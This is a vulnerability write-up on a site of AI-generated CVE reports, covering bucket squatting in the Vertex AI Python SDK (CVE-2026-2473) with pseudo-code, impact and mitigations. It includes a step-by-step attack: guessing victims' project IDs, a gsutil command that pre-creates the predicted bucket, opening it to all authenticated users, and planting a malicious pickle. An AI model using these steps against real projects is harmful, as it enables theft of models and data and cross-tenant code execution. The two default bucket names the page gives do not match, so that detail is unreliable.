CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-2473
7.7

Bucket Squatting on Google Vertex AI: Stealing Models with Predictable Names

Alon Barad
Alon Barad
Software Engineer

Feb 21, 2026·6 min read·5 visits

PoC Available

Executive Summary (TL;DR)

The Vertex AI SDK generated predictable GCS bucket names. Attackers could create these buckets first (squatting). Victim data goes to attacker; attacker code goes to victim. Update SDK to v1.133.0+.

A classic 'Bucket Squatting' vulnerability in the Google Cloud Vertex AI SDK allows unauthenticated attackers to hijack the default storage used by machine learning experiments. By predicting the name of the Google Cloud Storage (GCS) bucket that the SDK automatically generates—based on the victim's Project ID and region—an attacker can pre-create this bucket in their own tenant. When the victim initializes their Vertex AI environment using default settings, their proprietary models, datasets, and training logs are unwittingly uploaded to the attacker's infrastructure. Furthermore, this channel can be reversed to inject malicious serialized objects, leading to Cross-Tenant Remote Code Execution (RCE).

The Hook: Defaults Are the Devil's Playground

In the world of MLOps, friction is the enemy. Data scientists want to train models, not provision infrastructure. Google knows this, which is why the Vertex AI SDK (google-cloud-aiplatform) is packed with 'magic' defaults. When you initialize an experiment using aiplatform.init(), you don't have to specify a staging bucket. The SDK, in its infinite helpfulness, says, "Don't worry, I'll handle the plumbing."

And here lies the problem. Automation requires predictability. For the SDK to automatically find or create a bucket for your project without asking you for a name, it must use a deterministic algorithm to generate that name. It takes your Google Cloud Project ID, adds your region, and appends a static suffix.

But in the cloud, convenience is often a backdoor. Because Google Cloud Storage (GCS) operates on a single, global namespace, bucket names must be unique across all Google customers. If I know what your bucket is going to be named before you do, and I create it first, I own it. It doesn't matter that it contains your Project ID in the string. Possession is nine-tenths of the law, and in GCS, the account that creates the bucket owns the IAM policy.

The Flaw: A Global Namespace Collision

The vulnerability (CWE-340: Predictability Problems) stems from how python-aiplatform constructed these default names. Prior to version 1.133.0, the logic was effectively:

bucket_name = f"vertex-ai-experiments-{project_id}-{region}"

This string is entirely predictable. Project IDs are often public or easily guessable (e.g., company-name-prod, startup-dev). The region is usually one of the major hubs (like us-central1).

The flaw isn't just in the naming; it's in the verification. When the SDK initializes, it performs a check: "Does this bucket exist?" If the answer is "No," it creates it. If the answer is "Yes," it assumes the bucket belongs to the user and proceeds to upload sensitive artifacts. It failed to verify ownership.

This is the digital equivalent of mailing your tax returns to an address you found in the phone book without checking who actually lives there. If an attacker has already moved into 123 Vertex Lane, they are going to get your mail.

The Code: Reading the Tea Leaves

Let's look at the logic flow that enabled this. The vulnerable code path relied on standard GCS API calls that are indiscriminate regarding tenant boundaries.

The Vulnerable Logic (Conceptual):

# pseudo-code of the pre-patched logic
def get_default_bucket(project_id, region):
    # 1. Deterministic Name Generation
    name = f"vertex-ai-cloud-ml-{project_id}-{region}"
    bucket = storage_client.bucket(name)
    
    # 2. The Check-and-Use Race
    if not bucket.exists():
        bucket.create(project=project_id)
    
    # 3. Implicit Trust
    return bucket

The fix introduced in version 1.133.0 does two critical things: it adds entropy to the name (making it impossible to guess) and validates the project number of the bucket owner.

The Fix (Conceptual):

# pseudo-code of the patched logic
def get_default_bucket(project_id, region):
    # 1. Verification of Ownership
    if bucket.exists():
        if bucket.project_number != current_user_project_number:
             raise SecurityException("Bucket exists but belongs to another project!")
             
    # 2. Entropy (if creating new)
    suffix = random_string(8)
    name = f"vertex-ai-{project_id}-{region}-{suffix}"
    return create_bucket(name)

By enforcing an ownership check, the SDK ensures that even if a squatter did guess the name, the client would refuse to upload data to it.

The Exploit: Hijacking the Pipeline

Exploiting this requires no special tools—just a valid GCP account and a bit of patience. Here is how an attacker executes the "Bucket Squatting" attack against a target organization.

Phase 1: Reconnaissance The attacker identifies target Project IDs. This is easier than it sounds. They can be found in public GitHub repositories (embedded in config files), client-side JavaScript on public websites, or simply guessed (uber-internal-ml, openai-test-us).

Phase 2: The Land Grab The attacker uses a script to iterate through common regions (us-central1, europe-west4, asia-east1) and creates the predicted buckets in their own malicious GCP project.

# Attacker creates the trap
gsutil mb gs://vertex-ai-cloud-ml-targetcorp-prod-us-central1

Phase 3: The Honey Pot Configuration The attacker must allow the victim to write to this bucket. They update the IAM policy to grant roles/storage.objectAdmin to allAuthenticatedUsers. This sounds noisy, but since the bucket name is specific to the victim, random internet users aren't likely to stumble upon it. Only the victim's SDK will try to access it.

Phase 4: Execution The victim runs their daily training job:

aiplatform.init(project="targetcorp-prod", location="us-central1")
# The SDK finds the attacker's bucket and links it.

As the training job runs, it uploads model.joblib, dataset.csv, and logs containing hyperparameters directly to the attacker's storage.

The Impact: From Theft to RCE

The immediate impact is a Confidentiality Breach. Machine learning models are often the "crown jewels" of tech companies, costing millions in compute time to train. An attacker gets a free copy. They also get the training data, which often contains PII or sensitive financial records.

However, the Integrity and RCE impacts are darker. Vertex AI experiments often reload artifacts. If the pipeline includes a step to validate the model or deploy it, the SDK pulls the object back from the bucket.

Since the attacker owns the bucket, they can replace the legitimate model.pkl with a malicious pickle file. When the victim's python process deserializes this object to "evaluate" the model, the attacker's payload executes. This grants the attacker code execution inside the victim's Vertex AI environment—a trusted, internal network zone that likely has access to other databases and secrets.

Mitigation: Trust No One (Not Even Defaults)

The primary fix is to upgrade the google-cloud-aiplatform library to version 1.133.0 or later immediately. This version introduces the "Project Validation" check that kills this attack vector dead.

However, as a general security practice, relying on SDK defaults for infrastructure resources is a bad habit. Security teams should enforce explicit bucket declarations.

Secure Initialization:

# Don't do this:
# aiplatform.init(project=...)
 
# Do this:
aiplatform.init(
    project="my-project",
    location="us-central1",
    staging_bucket="gs://my-manually-secured-bucket-v1"
)

Additionally, organizations should run scans using tools like stratus-red-team or custom scripts to identify if any existing buckets used by their AI pipelines are hosted in projects they do not own. If you see data flowing to a bucket you can't see in your own Cloud Console, you have a problem.

Official Patches

GoogleOfficial SDK Release v1.133.0

Fix Analysis (1)

Technical Appendix

CVSS Score
7.7/ 10
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Affected Systems

Google Cloud Vertex AIpython-aiplatform SDK

Affected Versions Detail

Product
Affected Versions
Fixed Version
google-cloud-aiplatform
Google
>= 1.21.0, < 1.133.01.133.0
AttributeDetail
CWECWE-340 (Predictability Problems)
CVSS7.7 (High)
Attack VectorNetwork (Pre-allocation)
Privileges RequiredNone
ImpactData Exfiltration & RCE
Exploit StatusPoC / Method Known

MITRE ATT&CK Mapping

T1584.004Compromise Infrastructure: Serverless
Resource Development
T1565.001Stored Data Manipulation
Impact
T1537Transfer Data to Cloud Account
Exfiltration
CWE-340
Generation of Predictable Numbers or Identifiers

The software generates a predictable identifier for a resource, allowing an attacker to pre-create or guess the identifier to hijack the resource.

Known Exploits & Detection

Wiz ResearchOriginal research detailing the bucket squatting vector in Vertex AI.

Vulnerability Timeline

Fixed version 1.133.0 released by Google
2026-01-08
Public Disclosure and CVE-2026-2473 assigned
2026-02-20

References & Sources

  • [1]Google Cloud Security Bulletin GCP-2026-012
  • [2]Python Vertex AI SDK Repository

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.